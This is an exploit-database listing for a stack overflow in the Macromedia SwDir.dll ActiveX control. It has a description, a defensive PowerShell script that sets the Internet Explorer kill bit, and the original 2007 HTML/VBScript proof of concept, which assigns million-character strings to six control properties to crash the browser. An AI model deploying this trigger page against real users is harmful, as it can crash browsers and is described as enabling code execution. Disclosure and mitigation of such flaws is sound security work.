Macromedia SwDir.dll ver. 10.1.4.20 multiple methods Stack Overflow - exploit.company
Vendor: SwDir.dll
By: shinnai
CVSS: 7.5 (HIGH)
CWE: Stack Overflow
Product Name: SwDir.dll
Affected Version From: 10.1.4.20
Affected Version To: 10.1.4.20
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Professional SP2 with Internet Explorer 7

Macromedia SwDir.dll ver. 10.1.4.20 multiple methods Stack Overflow

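This proof of concept targets Macromedia SwDir.dll version 10.1.4.20, the ActiveX control that the test page instantiates in Internet Explorer by CLSID 233C1507-6A77-46A4-9443-F871F945D258. The "multiple methods" are several of the control's members (BGCOLOR, SRC, AutoStart, Sound, DrawLogo and DrawProgress), each of which triggers a stack overflow when it is assigned an overly long string. The page uses a select element to choose the member and a VBScript routine to assign it a 1,000,000-character string. An attacker who gets a user to load such a page can cause a stack overflow and potentially execute arbitrary code.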

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of Macromedia SwDir.dll. Additionally, users should exercise caution when interacting with untrusted websites or files.
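
Where no fixed build can be installed (the listing above records Patch Exists: NO), the standard stopgap for a vulnerable ActiveX control is the Internet Explorer kill bit. The PowerShell below is an added example, not part of the original advisory: it reports, and optionally sets, the kill bit for the CLSID used in the proof of concept; the helper names and the `$Apply` switch are illustrative.

```powershell
# Added example (not from the advisory): audit or set the IE kill bit for the
# control the PoC instantiates. Run elevated; writes under HKLM need admin rights.
$Clsid   = '{233C1507-6A77-46A4-9443-F871F945D258}'  # classid from the PoC <object> tag
$KillBit = 0x400                                      # Compatibility Flags bit that blocks loading in IE
$Name    = 'Compatibility Flags'
# Native registry view plus the 32-bit view that 32-bit IE reads on 64-bit Windows.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Get-KillBitState {            # hypothetical helper name
    param([string]$Root)
    $key   = Join-Path $Root $Clsid
    $flags = 0
    if (Test-Path -Path $key) {
        $prop = Get-ItemProperty -Path $key -Name $Name -ErrorAction SilentlyContinue
        if ($null -ne $prop) { $flags = [int]$prop.$Name }
    }
    [pscustomobject]@{
        Key        = $key
        Flags      = '0x{0:X8}' -f $flags
        KillBitSet = (($flags -band $KillBit) -ne 0)
        Raw        = $flags
    }
}

function Set-KillBit {                 # hypothetical helper name
    param([string]$Root)
    if (-not (Test-Path -Path $Root)) { return }   # e.g. no Wow6432Node on 32-bit Windows
    $state = Get-KillBitState -Root $Root
    if ($state.KillBitSet) { return }              # already blocked, leave other flags alone
    if (-not (Test-Path -Path $state.Key)) { New-Item -Path $state.Key -Force | Out-Null }
    # OR the bit in so any existing compatibility flags are preserved.
    New-ItemProperty -Path $state.Key -Name $Name -PropertyType DWord `
        -Value ($state.Raw -bor $KillBit) -Force | Out-Null
}

# Report only by default; set $Apply = $true to write the kill bit.
$Apply = $false
if ($Apply) { $Roots | ForEach-Object { Set-KillBit -Root $_ } }
$Roots | ForEach-Object { Get-KillBitState -Root $_ } |
    Select-Object Key, Flags, KillBitSet | Format-Table -AutoSize
```

The kill bit only stops Internet Explorer from instantiating the control; SwDir.dll itself is unchanged and remains exposed to any other host that loads it.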

Exploit-DB raw data:

<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
 Macromedia SwDir.dll ver. 10.1.4.20 multiple methods Stack Overflow
 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------


<object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258' id='Shockwave' style="WIDTH: 0px; HEIGHT: 0px" ></object>
<select style="width: 404px" name="Pucca">
  <option value = "BGCOLOR">BGCOLOR</option>
  <option value = "SRC">SRC</option>
  <option value = "AutoStart">AutoStart</option>
  <option value = "Sound">Sound</option>
  <option value = "DrawLogo">DrawLogo</option>
  <option value = "DrawProgress">DrawProgress</option>
  <option value = "Quoting">Quoting...</option>
</select>



<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  on error resume next
   if Pucca.value="BGCOLOR" then
     argCount   = 1
     arg1=String(1000000, "A")
     Shockwave.BGCOLOR = arg1   
   elseif Pucca.value="SRC" then
     argCount   = 1
     arg1=String(1000000, "A")
     Shockwave.SRC = arg1
   elseif Pucca.value = "AutoStart" then
     argCount = 1
     arg1=String(1000000, "A")
     Shockwave.AutoStart = arg1
   elseif Pucca.value = "Sound" then
     argCount = 1
     arg1=String(1000000, "A")
     Shockwave.Sound = arg1
   elseif Pucca.value = "DrawLogo" then
     argCount = 1
     arg1=String(1000000, "A")
     Shockwave.DrawLogo = arg1
   elseif Pucca.value = "DrawProgress" then
     argCount = 1
     arg1=String(1000000, "A")
     Shockwave.DrawProgress = arg1
   else
     MsgBox "Hence to fight and conquer in all your battles is not supreme excellence;" & vbCrLf & _
     "supreme excellence consists in breaking the enemy's resistance without fighting."
   end if
 End Sub
</script>
</span></span>
</code></pre>

# milw0rm.com [2007-03-07]